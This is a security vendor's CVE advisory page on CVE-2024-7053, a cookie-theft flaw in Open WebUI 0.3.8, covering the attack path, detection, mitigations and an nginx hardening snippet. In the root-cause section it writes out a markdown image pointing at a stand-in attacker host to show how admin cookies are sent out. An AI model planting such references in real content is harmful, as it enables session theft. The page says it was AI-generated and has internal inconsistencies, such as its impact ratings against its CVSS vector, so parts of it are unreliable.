A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Six years. Gartner® Magic Quadrant™ Leader.Find Out Why
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2024-7053

CVE-2024-7053: Open WebUI Session Fixation Vulnerability

CVE-2024-7053 is a session fixation flaw in Open WebUI 0.3.8 that enables attackers to steal administrator session cookies via malicious markdown images, leading to account takeover and potential RCE. This article covers technical details, affected versions, impact, and mitigation strategies.

Published: May 26, 2026

CVE-2024-7053 Overview

CVE-2024-7053 is a session fixation vulnerability in open-webui/open-webui version 0.3.8. The application sets session cookies with the default SameSite=Lax attribute and omits the Secure flag. This configuration allows session cookies to traverse HTTP to cross-origin domains. An authenticated user-level attacker can embed a malicious markdown image in a chat thread. When an administrator renders the chat, the browser transmits the admin session cookie to an attacker-controlled server. The result is a stealthy administrator account takeover that can be escalated to remote code execution (RCE) through privileged administrator functionality.

Critical Impact

Successful exploitation yields full administrator session takeover and potential remote code execution on the open-webui instance.

Affected Products

  • openwebui open_webui version 0.3.8
  • Deployments using default cookie configuration (SameSite=Lax, no Secure flag)
  • Multi-user open-webui instances where administrators interact with user-generated chat content

Discovery Timeline

  • 2025-03-20 - CVE-2024-7053 published to the National Vulnerability Database (NVD)
  • 2025-04-01 - Last updated in NVD database

Technical Details for CVE-2024-7053

Vulnerability Analysis

The flaw is a session fixation issue tracked under CWE-79, reflecting its delivery via stored cross-site content. The open-webui application issues authenticated session cookies without the Secure flag and with the permissive SameSite=Lax default. These cookies accompany requests initiated by browser-rendered resources, including images referenced inside markdown. Because chat content is shared between users and administrators, the markdown renderer becomes the delivery channel for attacker-controlled HTML. The privilege boundary between standard users and administrators collapses once the admin session token leaves the browser.

Root Cause

The root cause is insecure cookie configuration combined with unsanitized markdown rendering. SameSite=Lax permits cookies on top-level cross-site GET requests, and the missing Secure flag allows transmission over plaintext HTTP. The application does not restrict image sources in markdown content, so any user can author an ![](http://attacker/log.png) reference. When an administrator views the chat, the outbound request carries the admin session cookie to the attacker endpoint.

Attack Vector

Exploitation requires a low-privileged authenticated account and administrator interaction. The attacker posts a chat message containing a markdown image whose URL points to a logging endpoint they control. The administrator views the conversation, the browser fetches the image, and the admin session cookie is appended to the request headers received by the attacker. The attacker replays the captured cookie against the open-webui instance, assumes the administrator session, and uses administrative features to pivot toward RCE.

No verified exploit code is published. Technical details are available in the Huntr Bounty Report.

Detection Methods for CVE-2024-7053

Indicators of Compromise

  • Outbound HTTP requests from administrator browsers to untrusted external hosts triggered by chat rendering
  • Chat messages containing markdown image references with external URLs, especially shortened or obfuscated domains
  • Administrator sessions originating from new IP addresses or user agents shortly after a user posted chat content
  • Web server access logs showing Cookie: headers containing open-webui session tokens sent to unexpected hosts

Detection Strategies

  • Inspect open-webui database tables for stored chat content containing ![...](http://...) markdown image syntax pointing to external domains
  • Correlate administrator login events with preceding user-generated content interactions to identify session replay patterns
  • Monitor egress traffic from administrator workstations for connections to low-reputation domains generated by markdown rendering
  • Audit Set-Cookie headers from the open-webui server to confirm whether Secure and stricter SameSite attributes are present

Monitoring Recommendations

  • Forward open-webui application and reverse proxy logs to a centralized analytics platform for session anomaly correlation
  • Alert on administrator account activity sourced from IP addresses not previously associated with the admin user
  • Track outbound DNS queries from rendering clients to detect markdown-driven exfiltration channels
  • Continuously verify cookie security attributes after every open-webui upgrade or configuration change

How to Mitigate CVE-2024-7053

Immediate Actions Required

  • Upgrade open-webui to a version newer than 0.3.8 that ships with hardened cookie defaults and markdown sanitization
  • Force-invalidate all existing administrator sessions and rotate API keys after upgrading
  • Restrict open-webui access behind HTTPS-only ingress and disable plaintext HTTP listeners
  • Limit administrator accounts to dedicated workstations that do not browse user-generated chats

Patch Information

No vendor advisory URL is published in the NVD record. Review the Huntr Bounty Report and the open-webui project release notes for the fixed version. Confirm that post-upgrade responses set session cookies with Secure, HttpOnly, and SameSite=Strict attributes.

Workarounds

  • Terminate Transport Layer Security (TLS) at a reverse proxy and rewrite session cookies to include the Secure flag and SameSite=Strict
  • Deploy a Content Security Policy (CSP) that restricts img-src to the open-webui origin, blocking external image fetches from markdown
  • Strip or rewrite markdown image tags pointing to external domains at the proxy layer until a patched release is deployed
  • Segregate administrative tasks to a separate browser profile to prevent cookie exposure during chat review
bash
# Configuration example: enforce secure cookies via nginx reverse proxy
proxy_cookie_flags ~ secure samesite=strict httponly;
add_header Content-Security-Policy "img-src 'self' data:; default-src 'self'" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeAuth Bypass

  • Vendor/TechOpenwebui

  • SeverityCRITICAL

  • CVSS Score9.0

  • EPSS Probability0.23%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityHigh
  • AvailabilityHigh
  • CWE References
  • CWE-79
  • Technical References
  • Huntr Bounty Report
  • Related CVEs
  • CVE-2026-44569: Open WebUI Auth Bypass Vulnerability

  • CVE-2026-45386: Open WebUI Auth Bypass Vulnerability

  • CVE-2026-45365: Open WebUI Auth Bypass Vulnerability

  • CVE-2026-45349: Open WebUI Auth Bypass Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English